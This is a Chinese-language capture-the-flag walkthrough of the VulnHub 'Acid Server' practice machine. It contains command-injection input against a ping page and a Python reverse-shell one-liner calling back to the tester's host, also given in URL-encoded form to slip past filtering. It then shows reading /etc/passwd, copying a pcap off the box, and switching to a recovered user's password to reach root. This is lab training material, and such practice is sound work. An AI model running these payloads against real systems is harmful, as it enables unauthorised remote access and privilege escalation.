渗透测试
靶机下载:https://www.vulnhub.com/entry/acid-server,125/
设置kali和靶机连接方式都为NAT
端口扫描和目录爆破
确认靶机的地址为192.168.2.134
nmap扫描端口
发现了33447端口,从浏览器中打开
没找到什么线索
去扫描目录看看
/Challenge
/Challenge/include.php
最后找到了这个
/Challenge/Magic_Box/command.php
是一个ping命令执行页面
输入127.0.0.1;ls,查看源码,发现ls命令成功执行
接下来就可以反弹shell了
反弹shell
首先开启监听
构造反弹shell命令(因为kali一直连接不成功…这里主机换成了windows,ip也跟kali的不同)
192.168.2.1;python -c “import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘192.168.2.1’,7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/bash’,’-i’]);”
为了防止被过滤,;后面的内容使用url编码
192.168.2.1;%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%6f%73%2c%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%27%31%39%32%2e%31%36%38%2e%32%2e%31%27%2c%37%37%37%37%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%27%2f%62%69%6e%2f%62%61%73%68%27%2c%27%2d%69%27%5d%29%3b%22
(这里因浏览器表格内输入不了这么长的内容,需要用burpsuite抓包)
反弹shell成功
提权
通过cat /etc/passwd可以知道有哪些用户
发现了几个可疑的用户,find / -user XXX 2>/dev/null来挨个查看这几个用户文件
发现了这个hint.pcapng文件
scp /sbin/raw_vs_isi/hint.pcapng root@192.168.2.133:/root/ 将它传到kali
用wireshark打开,发现
疑似用户saman和密码
成功切换用户
升级为root
成功找到flag!